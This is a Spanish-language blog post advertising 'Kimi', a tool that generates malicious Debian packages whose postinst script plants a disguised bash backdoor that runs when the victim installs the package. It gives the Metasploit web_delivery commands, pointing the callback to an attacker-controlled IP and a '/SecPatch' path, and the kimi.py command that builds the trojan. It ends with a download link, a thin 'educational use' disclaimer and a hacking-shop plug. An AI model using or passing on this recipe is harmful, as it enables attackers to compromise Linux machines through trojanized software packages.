Kimi – Script para generar paquetes debian maliciosos (Troyanos debian)

0
913
views

Kimi es ta inspirado en un personal de “Naruto” llamado “Kimimaro”.

Kimi es un script que genera un paquete debian malicioso para metasploit, que consiste en un archivo bash. El archivo bash se despliega en el directorio “/ usr / local / bin /”.

La puerta trasera se ejecuta justo cuando la víctima intenta instalar el paquete deb debido al archivo postinst.

El fichero Bash se inyecta y también actúa como algún comando del sistema al ser  ejecutado por la víctima, al hacer esto el atacante obtiene sesión.

Kimi basicamente depende del modulo web_delivery y todo esta automatizado. Lo unico que tiene que hacer un ataquante es seguir las siguientes configuraciones.

Descarga kimi y corre el script para ver las opciones que ofrece.

Una vez hecho eso podemos configurar Web_Delivery desde msf

msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set srvhost 192.168.0.102
srvhost => 192.168.0.102
msf exploit(web_delivery) > set uripath /SecPatch
uripath => /SecPatch
msf exploit(web_delivery) > set Lhost 192.168.0.102
Lhost => 192.168.0.102
msf exploit(web_delivery) > show options
msf exploit(web_delivery) > exploit

Genrar el payload malicioso :


dreamer@mindless ~/Desktop/projects/kimi $ sudo python kimi.py -n nano -l 127.0.0.1 -V 1.0

Kimi ha sido probado en :

  • Linux Mint 17.2 Cinnamon (Ubuntu 14.04)
  • ParrotOS (Debian Jessie)
  • Kali Rolling 2.0

Descarga Kimi

Toda la información proporcionada en este medio es para fines educativos, en ningún caso alguno se hace responsable e cualquier mal uso de la información. Toda la información es para el desarrollo e investigación de métodos de seguridad informática.

No olvides visitar nuestra hacking shop

shop